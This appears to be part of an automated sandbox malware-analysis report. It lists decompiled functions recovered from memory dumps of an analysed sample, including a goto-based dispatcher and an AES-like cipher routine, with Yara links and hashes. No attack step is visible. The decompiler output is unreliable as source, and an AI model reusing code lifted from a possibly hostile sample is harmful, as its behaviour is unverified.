                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A752C0 Relevance: .9, Instructions: 938COMMONLIBRARYCODECrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A752C0(void* __ecx, void* __rcx, void* __rdx) {
				void* _t47;
				void* _t65;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;
				void* _t164;
				void* _t166;

				_t166 = __rcx;
				_t157 = __ecx - 0x36;
				if (_t157 > 0) goto 0xf8a75692;
				if (_t157 == 0) goto 0xf8a75684;
				_t158 = __ecx - 0x1c;
				if (_t158 > 0) goto 0xf8a754d1;
				if (_t158 == 0) goto 0xf8a754c8;
				_t159 = __ecx - 0xe;
				if (_t159 > 0) goto 0xf8a753e3;
				if (_t159 == 0) goto 0xf8a753ce;
				if (_t159 == 0) goto 0xf8a753b7;
				if (_t159 == 0) goto 0xf8a753a7;
				if (_t159 == 0) goto 0xf8a75399;
				if (_t159 == 0) goto 0xf8a7538b;
				if (_t159 == 0) goto 0xf8a75377;
				if (_t159 == 0) goto 0xf8a75362;
				if (_t159 == 0) goto 0xf8a7534d;
				if (_t159 == 0) goto 0xf8a7533f;
				if (_t159 != 0) goto 0xf8a75976;
				_t1 = _t166 + 1; // -12
				r8d = _t1;
				goto 0xf8a77bf0;
				goto E0000025B25BF8A6DC20;
				goto E0000025B25BF8A6F370;
				goto E0000025B25BF8A6E258;
				r8d = 1;
				goto E0000025B25BF8A70108;
				goto E0000025B25BF8A6DA70;
				goto E0000025B25BF8A6DFC0;
				goto E0000025B25BF8A6DAAC;
				r9d = 1;
				r8d = r9d;
				goto E0000025B25BF8A7000C;
				goto E0000025B25BF8A73540;
				if (_t159 == 0) goto 0xf8a754ba;
				if (_t159 == 0) goto 0xf8a754ac;
				if (_t159 == 0) goto 0xf8a75497;
				if (_t159 == 0) goto 0xf8a7547c;
				if (_t159 == 0) goto 0xf8a7546e;
				if (_t159 == 0) goto 0xf8a75459;
				if (_t159 == 0) goto 0xf8a75444;
				_t47 = __ecx - 0xffffffffffffffdd;
				if (_t159 == 0) goto 0xf8a7542f;
				if (_t47 != 3) goto 0xf8a75976;
				goto 0xf8a785b4;
				goto E0000025B25BF8A72044;
				goto E0000025B25BF8A721FC;
				goto E0000025B25BF8A720A4;
				goto E0000025B25BF8A6F55C;
				r8d = 1;
				goto E0000025B25BF8A70268;
				goto E0000025B25BF8A736B0;
				goto E0000025B25BF8A73504;
				goto E0000025B25BF8A7373C;
				goto E0000025B25BF8A7872C;
				_t161 = _t47 - 0x2b;
				if (_t161 > 0) goto 0xf8a755bb;
				if (_t161 == 0) goto 0xf8a755b3;
				if (_t161 == 0) goto 0xf8a7559e;
				if (_t161 == 0) goto 0xf8a75589;
				if (_t161 == 0) goto 0xf8a7557b;
				if (_t161 == 0) goto 0xf8a7556d;
				if (_t161 == 0) goto 0xf8a75558;
				if (_t161 == 0) goto 0xf8a75548;
				if (_t161 == 0) goto 0xf8a75534;
				if (_t161 == 0) goto 0xf8a75524;
				if (_t161 != 0) goto 0xf8a75976;
				goto E0000025B25BF8A7188C;
				goto E0000025B25BF8A71A2C;
				r9d = 0;
				r8d = 0;
				goto E0000025B25BF8A718DC;
				goto E0000025B25BF8A6DD28;
				goto E0000025B25BF8A6DD78;
				goto E0000025B25BF8A74124;
				goto 0xf8a75a0c;
				goto 0xf8a75a90;
				goto 0xf8a78778;
				r8d = 0;
				goto 0xf8a7537d;
				if (_t161 == 0) goto 0xf8a75676;
				if (_t161 == 0) goto 0xf8a7565b;
				if (_t161 == 0) goto 0xf8a75656;
				if (_t161 == 0) goto 0xf8a75648;
				if (_t161 == 0) goto 0xf8a75633;
				if (_t161 == 0) goto 0xf8a75622;
				if (_t161 == 0) goto 0xf8a75614;
				if (_t161 == 0) goto 0xf8a75606;
				_t65 = _t47 - 0xffffffffffffffdf;
				if (_t161 != 0) goto 0xf8a75976;
				goto E0000025B25BF8A6F90C;
				goto E0000025B25BF8A6E010;
				goto E0000025B25BF8A7382C;
				r8d = 0;
				goto E0000025B25BF8A737A0;
				goto 0xf8a78648;
				goto E0000025B25BF8A6DCFC;
				r9d = 0;
				goto 0xf8a75661;
				r9d = 1;
				goto E0000025B25BF8A701F4;
				r9d = 1;
				r8d = 0;
				goto 0xf8a753c0;
				goto E0000025B25BF8A6FB84;
				_t162 = _t65 - 0x4f;
				if (_t162 > 0) goto 0xf8a7583f;
				if (_t162 == 0) goto 0xf8a75831;
				_t163 = _t65 - 0x45;
				if (_t163 > 0) goto 0xf8a75775;
				if (_t163 == 0) goto 0xf8a7576d;
				if (_t163 == 0) goto 0xf8a75758;
				if (_t163 == 0) goto 0xf8a7574a;
				if (_t163 == 0) goto 0xf8a7573c;
				if (_t163 == 0) goto 0xf8a7572e;
				if (_t163 == 0) goto 0xf8a75720;
				if (_t163 == 0) goto 0xf8a75710;
				if (_t163 == 0) goto 0xf8a75704;
				if (_t163 == 0) goto 0xf8a756f8;
				if (_t163 != 0) goto 0xf8a75976;
				goto E0000025B25BF8A72510;
				goto 0xf8a75369;
				r9d = 0;
				r8d = 0x25bf8a6c1d9;
				goto 0xf8a7553a;
				goto E0000025B25BF8A6E568;
				goto E0000025B25BF8A6E61C;
				goto 0xf8a78d9c;
				goto E0000025B25BF8A6E0FC;
				goto E0000025B25BF8A6F818;
				goto E0000025B25BF8A6F878;
				r8d = 0;
				goto 0xf8a75331;
				if (_t163 == 0) goto 0xf8a7581a;
				if (_t163 == 0) goto 0xf8a7580f;
				if (_t163 == 0) goto 0xf8a75801;
				if (_t163 == 0) goto 0xf8a757f3;
				if (_t163 == 0) goto 0xf8a757e5;
				if (_t163 == 0) goto 0xf8a757d7;
				if (_t163 == 0) goto 0xf8a757c9;
				if (_t163 == 0) goto 0xf8a757b4;
				if (_t163 != 0) goto 0xf8a75976;
				goto E0000025B25BF8A6DAC4;
				goto E0000025B25BF8A6E6B8;
				goto E0000025B25BF8A6DEA4;
				goto E0000025B25BF8A74578;
				goto E0000025B25BF8A6FBC4;
				goto E0000025B25BF8A6F74C;
				goto E0000025B25BF8A6DFB8;
				r9d = 1;
				r8d = 0;
				goto 0xf8a75823;
				r9d = 1;
				r8d = r9d;
				goto E0000025B25BF8A702E4;
				goto E0000025B25BF8A740D8;
				_t164 = _t65 - 0xffffffffffffffdc - 0x5b;
				if (_t164 > 0) goto 0xf8a758f4;
				if (_t164 == 0) goto 0xf8a758ec;
				if (_t164 == 0) goto 0xf8a758de;
				if (_t164 == 0) goto 0xf8a758d0;
				if (_t164 == 0) goto 0xf8a758c2;
				if (_t164 == 0) goto 0xf8a758b2;
				if (_t164 == 0) goto 0xf8a7589d;
				if (_t164 == 0) goto 0xf8a75894;
				if (_t164 == 0) goto 0xf8a7588f;
				if (_t164 == 0) goto 0xf8a75883;
				if (_t164 != 0) goto 0xf8a75976;
				r9d = 0;
				goto 0xf8a7567c;
				r9d = 0;
				r8d = 0x25bf8a6c1d9;
				goto 0xf8a753c0;
				r9d = 0;
				goto 0xf8a75815;
				r9d = 0;
				r8d = 0x25bf8a6c1d9;
				goto 0xf8a75823;
				goto E0000025B25BF8A72988;
				goto E0000025B25BF8A6BC7C;
				goto E0000025B25BF8A6BD00;
				goto E0000025B25BF8A6BB84;
				goto E0000025B25BF8A73890;
				r8d = 0;
				goto 0xf8a75482;
				if (_t164 == 0) goto 0xf8a7596c;
				if (_t164 == 0) goto 0xf8a75958;
				if (_t164 == 0) goto 0xf8a75953;
				if (_t164 == 0) goto 0xf8a7593f;
				if (_t164 == 0) goto 0xf8a7593a;
				if (_t164 == 0) goto 0xf8a7592c;
				if (_t164 == 0) goto 0xf8a75921;
				if (_t164 != 0) goto 0xf8a75976;
				r8d = 0x100007f;
				goto 0xf8a75625;
				r9d = 1;
				goto 0xf8a75537;
				goto E0000025B25BF8A6C438;
				r8d = 0;
				goto 0xf8a75945;
				r8d = 1;
				goto E0000025B25BF8A706CC;
				r8d = 0;
				goto 0xf8a7595e;
				r8d = 1;
				goto E0000025B25BF8A7057C;
				return E0000025B25BF8A74490(_t65 - 0xffffffffffffff1c, r8d, r8d, __rdx);
			}













                                                                                                                            0x25bf8a752c0
                                                                                                                            0x25bf8a752ca
                                                                                                                            0x25bf8a752cd
                                                                                                                            0x25bf8a752d3
                                                                                                                            0x25bf8a752d9
                                                                                                                            0x25bf8a752dc
                                                                                                                            0x25bf8a752e2
                                                                                                                            0x25bf8a752e8
                                                                                                                            0x25bf8a752eb
                                                                                                                            0x25bf8a752f1
                                                                                                                            0x25bf8a752f9
                                                                                                                            0x25bf8a75302
                                                                                                                            0x25bf8a7530a
                                                                                                                            0x25bf8a75312
                                                                                                                            0x25bf8a75317
                                                                                                                            0x25bf8a7531b
                                                                                                                            0x25bf8a7531f
                                                                                                                            0x25bf8a75323
                                                                                                                            0x25bf8a75327
                                                                                                                            0x25bf8a7532d
                                                                                                                            0x25bf8a7532d
                                                                                                                            0x25bf8a7533a
                                                                                                                            0x25bf8a75348
                                                                                                                            0x25bf8a7535d
                                                                                                                            0x25bf8a75372
                                                                                                                            0x25bf8a75377
                                                                                                                            0x25bf8a75386
                                                                                                                            0x25bf8a75394
                                                                                                                            0x25bf8a753a2
                                                                                                                            0x25bf8a753b2
                                                                                                                            0x25bf8a753b7
                                                                                                                            0x25bf8a753bd
                                                                                                                            0x25bf8a753c9
                                                                                                                            0x25bf8a753de
                                                                                                                            0x25bf8a753e6
                                                                                                                            0x25bf8a753ee
                                                                                                                            0x25bf8a753f6
                                                                                                                            0x25bf8a753fe
                                                                                                                            0x25bf8a75402
                                                                                                                            0x25bf8a75407
                                                                                                                            0x25bf8a7540b
                                                                                                                            0x25bf8a7540d
                                                                                                                            0x25bf8a7540f
                                                                                                                            0x25bf8a75414
                                                                                                                            0x25bf8a7542a
                                                                                                                            0x25bf8a7543f
                                                                                                                            0x25bf8a75454
                                                                                                                            0x25bf8a75469
                                                                                                                            0x25bf8a75477
                                                                                                                            0x25bf8a7547c
                                                                                                                            0x25bf8a75492
                                                                                                                            0x25bf8a754a7
                                                                                                                            0x25bf8a754b5
                                                                                                                            0x25bf8a754c3
                                                                                                                            0x25bf8a754cc
                                                                                                                            0x25bf8a754d1
                                                                                                                            0x25bf8a754d4
                                                                                                                            0x25bf8a754da
                                                                                                                            0x25bf8a754e3
                                                                                                                            0x25bf8a754eb
                                                                                                                            0x25bf8a754f3
                                                                                                                            0x25bf8a754fc
                                                                                                                            0x25bf8a75500
                                                                                                                            0x25bf8a75504
                                                                                                                            0x25bf8a75508
                                                                                                                            0x25bf8a7550c
                                                                                                                            0x25bf8a75510
                                                                                                                            0x25bf8a7551f
                                                                                                                            0x25bf8a7552f
                                                                                                                            0x25bf8a75534
                                                                                                                            0x25bf8a75537
                                                                                                                            0x25bf8a75543
                                                                                                                            0x25bf8a75553
                                                                                                                            0x25bf8a75568
                                                                                                                            0x25bf8a75576
                                                                                                                            0x25bf8a75584
                                                                                                                            0x25bf8a75599
                                                                                                                            0x25bf8a755ae
                                                                                                                            0x25bf8a755b3
                                                                                                                            0x25bf8a755b6
                                                                                                                            0x25bf8a755be
                                                                                                                            0x25bf8a755c6
                                                                                                                            0x25bf8a755ce
                                                                                                                            0x25bf8a755d6
                                                                                                                            0x25bf8a755db
                                                                                                                            0x25bf8a755df
                                                                                                                            0x25bf8a755e3
                                                                                                                            0x25bf8a755e7
                                                                                                                            0x25bf8a755e9
                                                                                                                            0x25bf8a755eb
                                                                                                                            0x25bf8a75601
                                                                                                                            0x25bf8a7560f
                                                                                                                            0x25bf8a7561d
                                                                                                                            0x25bf8a75622
                                                                                                                            0x25bf8a7562e
                                                                                                                            0x25bf8a75643
                                                                                                                            0x25bf8a75651
                                                                                                                            0x25bf8a75656
                                                                                                                            0x25bf8a75659
                                                                                                                            0x25bf8a7565b
                                                                                                                            0x25bf8a75671
                                                                                                                            0x25bf8a75676
                                                                                                                            0x25bf8a7567c
                                                                                                                            0x25bf8a7567f
                                                                                                                            0x25bf8a7568d
                                                                                                                            0x25bf8a75692
                                                                                                                            0x25bf8a75695
                                                                                                                            0x25bf8a7569b
                                                                                                                            0x25bf8a756a1
                                                                                                                            0x25bf8a756a4
                                                                                                                            0x25bf8a756aa
                                                                                                                            0x25bf8a756b3
                                                                                                                            0x25bf8a756bb
                                                                                                                            0x25bf8a756c3
                                                                                                                            0x25bf8a756c8
                                                                                                                            0x25bf8a756cc
                                                                                                                            0x25bf8a756d0
                                                                                                                            0x25bf8a756d4
                                                                                                                            0x25bf8a756d9
                                                                                                                            0x25bf8a756dd
                                                                                                                            0x25bf8a756f3
                                                                                                                            0x25bf8a756ff
                                                                                                                            0x25bf8a75704
                                                                                                                            0x25bf8a75707
                                                                                                                            0x25bf8a7570b
                                                                                                                            0x25bf8a7571b
                                                                                                                            0x25bf8a75729
                                                                                                                            0x25bf8a75737
                                                                                                                            0x25bf8a75745
                                                                                                                            0x25bf8a75753
                                                                                                                            0x25bf8a75768
                                                                                                                            0x25bf8a7576d
                                                                                                                            0x25bf8a75770
                                                                                                                            0x25bf8a75778
                                                                                                                            0x25bf8a75780
                                                                                                                            0x25bf8a75788
                                                                                                                            0x25bf8a7578c
                                                                                                                            0x25bf8a75790
                                                                                                                            0x25bf8a75794
                                                                                                                            0x25bf8a75798
                                                                                                                            0x25bf8a7579c
                                                                                                                            0x25bf8a757a0
                                                                                                                            0x25bf8a757af
                                                                                                                            0x25bf8a757c4
                                                                                                                            0x25bf8a757d2
                                                                                                                            0x25bf8a757e0
                                                                                                                            0x25bf8a757ee
                                                                                                                            0x25bf8a757fc
                                                                                                                            0x25bf8a7580a
                                                                                                                            0x25bf8a7580f
                                                                                                                            0x25bf8a75815
                                                                                                                            0x25bf8a75818
                                                                                                                            0x25bf8a7581a
                                                                                                                            0x25bf8a75820
                                                                                                                            0x25bf8a7582c
                                                                                                                            0x25bf8a7583a
                                                                                                                            0x25bf8a7583f
                                                                                                                            0x25bf8a75842
                                                                                                                            0x25bf8a75848
                                                                                                                            0x25bf8a75851
                                                                                                                            0x25bf8a75859
                                                                                                                            0x25bf8a7585d
                                                                                                                            0x25bf8a75861
                                                                                                                            0x25bf8a75865
                                                                                                                            0x25bf8a75869
                                                                                                                            0x25bf8a7586d
                                                                                                                            0x25bf8a75871
                                                                                                                            0x25bf8a75875
                                                                                                                            0x25bf8a7587b
                                                                                                                            0x25bf8a7587e
                                                                                                                            0x25bf8a75883
                                                                                                                            0x25bf8a75886
                                                                                                                            0x25bf8a7588a
                                                                                                                            0x25bf8a7588f
                                                                                                                            0x25bf8a75892
                                                                                                                            0x25bf8a75894
                                                                                                                            0x25bf8a75897
                                                                                                                            0x25bf8a7589b
                                                                                                                            0x25bf8a758ad
                                                                                                                            0x25bf8a758bd
                                                                                                                            0x25bf8a758cb
                                                                                                                            0x25bf8a758d9
                                                                                                                            0x25bf8a758e7
                                                                                                                            0x25bf8a758ec
                                                                                                                            0x25bf8a758ef
                                                                                                                            0x25bf8a758f7
                                                                                                                            0x25bf8a758fb
                                                                                                                            0x25bf8a758ff
                                                                                                                            0x25bf8a75904
                                                                                                                            0x25bf8a75908
                                                                                                                            0x25bf8a7590c
                                                                                                                            0x25bf8a75910
                                                                                                                            0x25bf8a75914
                                                                                                                            0x25bf8a75916
                                                                                                                            0x25bf8a7591c
                                                                                                                            0x25bf8a75921
                                                                                                                            0x25bf8a75927
                                                                                                                            0x25bf8a75935
                                                                                                                            0x25bf8a7593a
                                                                                                                            0x25bf8a7593d
                                                                                                                            0x25bf8a7593f
                                                                                                                            0x25bf8a7594e
                                                                                                                            0x25bf8a75953
                                                                                                                            0x25bf8a75956
                                                                                                                            0x25bf8a75958
                                                                                                                            0x25bf8a75967
                                                                                                                            0x25bf8a7597a

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f78aa7e5eb3977471cc3ec1bdac26d01691bdcdd88ce57bc4dc661ce3c4360e5
                                                                                                                            • Instruction ID: aa3679447e86904e065ba8b25d9d96d582eb4b14a3582c5c0b191819b9fdb3fe
                                                                                                                            • Opcode Fuzzy Hash: f78aa7e5eb3977471cc3ec1bdac26d01691bdcdd88ce57bc4dc661ce3c4360e5
                                                                                                                            • Instruction Fuzzy Hash: 7B72D213B05E4082FE6ADB269C5C36D12D1F7897A2FB45115FA0A43FD9EF38C542A728
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD85D0 Relevance: .8, Instructions: 783COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction ID: 5d08ac09490c35573e175cac35b875ea96dfeb7525e255db5d8f017e4c39313d
                                                                                                                            • Opcode Fuzzy Hash: 0cf1303b3d3e9358c47f761ee998a4d7d5b97797fb10bb526303a2194177b4b1
                                                                                                                            • Instruction Fuzzy Hash: 6862FB312286558FD31CCB1CC5B1B7AB7E1FB8A340F44896DE28BCB692C639D945CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD7C60 Relevance: .8, Instructions: 761COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction ID: 64e202115224da9e4eab7a1740e5bf712e3601120f2dcb188374b81781102e28
                                                                                                                            • Opcode Fuzzy Hash: 5e159a6cc57e26d344b09782dae72ac89cbff88d6f40c27d95e82b3f629b8c26
                                                                                                                            • Instruction Fuzzy Hash: 3552EE312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE286CB692C639D645CB91
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A879D0 Relevance: .6, Instructions: 617COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A879D0(void* __edi, void* __esp, long long __rcx, long long __rdx, long long __r8, char* _a4, long long _a8, intOrPtr _a12, long long _a16, long long _a24) {
				signed long long _v4;
				signed int _v24;
				signed int _v28;
				signed long long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed long long _t731;
				signed long long _t732;
				signed long long _t733;
				signed long long _t734;
				signed long long _t735;
				signed long long _t736;
				signed long long _t737;
				signed long long _t738;
				signed long long _t739;
				signed long long _t741;
				signed long long _t744;
				signed long long _t745;
				signed long long _t749;
				signed long long _t750;
				signed long long _t754;
				signed long long _t755;
				signed long long _t759;
				signed long long _t760;
				signed long long _t816;
				signed long long _t819;
				signed long long _t822;
				signed long long _t825;
				signed long long _t828;
				signed long long _t831;
				signed long long _t834;
				signed long long _t837;
				void* _t874;
				signed int* _t875;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_t875 = _t874 - 0x30;
				memset(__edi, 0xcccccccc, 0xc << 2);
				_v28 =  *((intOrPtr*)(_a12 + 0x1e0));
				_t731 = _a12 + 0xf0;
				_v36 = _t731;
				_t732 = _t731 * 0;
				_t744 = _v4;
				_t745 = _t744;
				 *_t875 = ( *(_t744 + _t732) & 0xff) << 0x00000018 | ( *(_v4 + _t745) & 0xff) << 0x00000010 | ( *(_v4 + _t745 * 2) & 0xff) << 0x00000008 |  *(_v4 + _t745 * 2 * 3) & 0xff;
				_t733 = _t732 * 0;
				 *_t875 =  *_t875 ^  *(_v36 + _t733);
				_t734 = _t733 * 0;
				_t749 = _v4;
				_t750 = _t749;
				_v64 = ( *(_t749 + _t734 + 4) & 0xff) << 0x00000018 | ( *(_v4 + _t750 + 4) & 0xff) << 0x00000010 | ( *(_v4 + 4 + _t750 * 2) & 0xff) << 0x00000008 |  *(_v4 + 4 + _t750 * 2 * 3) & 0xff;
				_t735 = _t734;
				_v64 = _v64 ^  *(_v36 + _t735);
				_t736 = _t735 * 0;
				_t754 = _v4;
				_t755 = _t754;
				_v60 = ( *(_t754 + _t736 + 8) & 0xff) << 0x00000018 | ( *(_v4 + _t755 + 8) & 0xff) << 0x00000010 | ( *(_v4 + 8 + _t755 * 2) & 0xff) << 0x00000008 |  *(_v4 + 8 + _t755 * 2 * 3) & 0xff;
				_t737 = _t736 * 2;
				_v60 = _v60 ^  *(_v36 + _t737);
				_t738 = _t737 * 0;
				_t759 = _v4;
				_t760 = _t759;
				_t761 = _t760 * 2;
				_t816 = _v4;
				_v56 = ( *(_t759 + _t738 + 0xc) & 0xff) << 0x00000018 | ( *(_v4 + _t760 + 0xc) & 0xff) << 0x00000010 | ( *(_v4 + 0xc + _t760 * 2) & 0xff) << 0x00000008 |  *(_t816 + 0xc + _t761 * 3) & 0xff;
				_t739 = _t738 * 3;
				_v56 = _v56 ^  *(_v36 + _t739);
				_v24 = _v28 >> 1;
				_t819 = _v36;
				_v52 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t816 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t819 + 0x96fe2a49e80);
				_t822 = _v36;
				_v48 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t819 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t822 + 0xbcbdb4dc620);
				_t825 = _v36;
				_v44 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t822 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t825 + 0xe27d3f6edc0);
				_t828 = _v36;
				_v40 =  *(0xf8a927a0 + _t739 * 4) ^  *(0xf8a94ba0 + _t825 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t828 + 0x1083cca01560);
				_t741 = _v36 + 0x20;
				_v36 = _t741;
				_v24 = _v24 - 1;
				if (_v24 != 0) goto 0xf8a87e26;
				goto 0xf8a87fca;
				_t831 = _v36;
				 *_t875 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t828 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *_t831;
				_t834 = _v36;
				_v64 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t831 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t834 + 0x25bf8a927a0);
				_t837 = _v36;
				_v60 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t834 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_t837 + 0x4b7f1524f40);
				_v56 =  *(0xf8a927a0 + _t741 * 4) ^  *(0xf8a94ba0 + _t837 * 4) ^  *0xBCBDB4DEE20 ^  *0xBCBDB4DF220 ^  *(_v36 + 0x713e9fb76e0);
				goto 0xf8a87c66;
				 *_t875 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
				 *((char*)(_a4 + 0xf8a92ba0)) =  *_t875 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0xf8a92ba0)) =  *_t875 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0xf8a92ba0)) =  *_t875 >> 0x00000008 & 0x000000ff;
				 *_a4 =  *_t875 & 0x000000ff;
				_v64 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
				 *((char*)(_a4 + 0x25bf8a92ba4)) = _v64 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a92ba4)) = _v64 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a92ba4)) = _v64 >> 0x00000008 & 0x000000ff;
				 *((char*)(_a4 + 4)) = _v64 & 0x000000ff;
				_v60 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
				 *((char*)(_a4 + 0x25bf8a92ba8)) = _v60 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a92ba8)) = _v60 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a92ba8)) = _v60 >> 0x00000008 & 0x000000ff;
				 *((char*)(_a4 + 8)) = _v60 & 0x000000ff;
				_v56 =  *(0xf8a92ba0 + _t741 * 4) & 0xff000000 ^  *0xBCBDB4DDA20 & 0x00ff0000 ^  *0xBCBDB4DDA20 & 0x0000ff00 ^  *0xBCBDB4DDA20 & 0x000000ff ^  *(_v36 + 0xf8a92ba0);
				 *((char*)(_a4 + 0x25bf8a92bac)) = _v56 >> 0x00000018 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a92bac)) = _v56 >> 0x00000010 & 0x000000ff;
				 *((char*)(_a4 + 0x25bf8a92bac)) = _v56 >> 0x00000008 & 0x000000ff;
				 *((char*)(_a4 + 0xc)) = _v56 & 0x000000ff;
				return 0;
			}










































                                                                                                                            0x25bf8a879d0
                                                                                                                            0x25bf8a879d5
                                                                                                                            0x25bf8a879da
                                                                                                                            0x25bf8a879e0
                                                                                                                            0x25bf8a879f1
                                                                                                                            0x25bf8a87a03
                                                                                                                            0x25bf8a87a0c
                                                                                                                            0x25bf8a87a12
                                                                                                                            0x25bf8a87a1c
                                                                                                                            0x25bf8a87a20
                                                                                                                            0x25bf8a87a36
                                                                                                                            0x25bf8a87a85
                                                                                                                            0x25bf8a87a8d
                                                                                                                            0x25bf8a87aa0
                                                                                                                            0x25bf8a87aa8
                                                                                                                            0x25bf8a87aac
                                                                                                                            0x25bf8a87ac3
                                                                                                                            0x25bf8a87b15
                                                                                                                            0x25bf8a87b1e
                                                                                                                            0x25bf8a87b32
                                                                                                                            0x25bf8a87b3b
                                                                                                                            0x25bf8a87b3f
                                                                                                                            0x25bf8a87b56
                                                                                                                            0x25bf8a87ba8
                                                                                                                            0x25bf8a87bb1
                                                                                                                            0x25bf8a87bc5
                                                                                                                            0x25bf8a87bce
                                                                                                                            0x25bf8a87bd2
                                                                                                                            0x25bf8a87be9
                                                                                                                            0x25bf8a87c07
                                                                                                                            0x25bf8a87c29
                                                                                                                            0x25bf8a87c3b
                                                                                                                            0x25bf8a87c44
                                                                                                                            0x25bf8a87c58
                                                                                                                            0x25bf8a87c62
                                                                                                                            0x25bf8a87cc1
                                                                                                                            0x25bf8a87cc9
                                                                                                                            0x25bf8a87d28
                                                                                                                            0x25bf8a87d30
                                                                                                                            0x25bf8a87d8f
                                                                                                                            0x25bf8a87d97
                                                                                                                            0x25bf8a87df6
                                                                                                                            0x25bf8a87dfe
                                                                                                                            0x25bf8a87e07
                                                                                                                            0x25bf8a87e0b
                                                                                                                            0x25bf8a87e16
                                                                                                                            0x25bf8a87e1f
                                                                                                                            0x25bf8a87e21
                                                                                                                            0x25bf8a87e82
                                                                                                                            0x25bf8a87e8a
                                                                                                                            0x25bf8a87ee9
                                                                                                                            0x25bf8a87ef1
                                                                                                                            0x25bf8a87f51
                                                                                                                            0x25bf8a87f59
                                                                                                                            0x25bf8a87fc1
                                                                                                                            0x25bf8a87fc5
                                                                                                                            0x25bf8a88048
                                                                                                                            0x25bf8a88064
                                                                                                                            0x25bf8a88080
                                                                                                                            0x25bf8a8809c
                                                                                                                            0x25bf8a880b5
                                                                                                                            0x25bf8a88136
                                                                                                                            0x25bf8a88154
                                                                                                                            0x25bf8a88172
                                                                                                                            0x25bf8a88190
                                                                                                                            0x25bf8a881ab
                                                                                                                            0x25bf8a8822d
                                                                                                                            0x25bf8a8824b
                                                                                                                            0x25bf8a88269
                                                                                                                            0x25bf8a88287
                                                                                                                            0x25bf8a882a2
